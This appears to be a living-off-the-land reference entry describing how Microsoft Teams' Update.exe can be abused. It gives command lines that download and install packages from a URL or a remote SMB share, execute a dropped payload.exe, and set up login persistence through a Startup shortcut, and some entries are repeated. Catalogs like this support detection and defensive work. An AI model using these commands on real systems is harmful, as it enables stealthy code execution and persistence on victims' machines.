Binary to update the existing installed Nuget/squirrel package. Part of Microsoft Teams installation.
The above binary will go to url and look for RELEASES file and download the nuget package.
Update.exe --download [url to package]
The above binary will go to url and look for RELEASES file, download and install the nuget package.
Update.exe --update=[url to package]
The above binary will go to url and look for RELEASES file, download and install the nuget package via SAMBA.
Update.exe --update=\\remoteserver\payloadFolder
The above binary will go to url and look for RELEASES file, download and install the nuget package.
Update.exe --updateRollback=[url to package]
Copy your payload into %userprofile%\AppData\Local\Microsoft\Teams\current\. Then run the command. Update.exe will execute the file you copied.
Update.exe --processStart payload.exe --process-start-args "whatever args"
The above binary will go to url and look for RELEASES file, download and install the nuget package via SAMBA.
Update.exe --updateRollback=\\remoteserver\payloadFolder
The above binary will go to url and look for RELEASES file, download and install the nuget package.
Update.exe --update=[url to package]
The above binary will go to url and look for RELEASES file, download and install the nuget package via SAMBA.
Update.exe --update=\\remoteserver\payloadFolder
The above binary will go to url and look for RELEASES file, download and install the nuget package.
Update.exe --updateRollback=[url to package]
The above binary will go to url and look for RELEASES file, download and install the nuget package via SAMBA.
Update.exe --updateRollback=\\remoteserver\payloadFolder
Copy your payload into %userprofile%\AppData\Local\Microsoft\Teams\current\. Then run the command. Update.exe will execute the file you copied.
Update.exe --processStart payload.exe --process-start-args "whatever args"
Copy your payload into "%localappdata%\Microsoft\Teams\current\". Then run the command. Update.exe will create a payload.exe shortcut in "%appdata%\Microsoft\Windows\Start Menu\Programs\Startup". Then payload will run on every login of the user who runs it.
Update.exe --createShortcut=payload.exe -l=Startup
Run the command to remove the shortcut created in the "%appdata%\Microsoft\Windows\Start Menu\Programs\Startup" directory you created with the LolBinExecution "--createShortcut" described on this page.
Update.exe --removeShortcut=payload.exe -l=Startup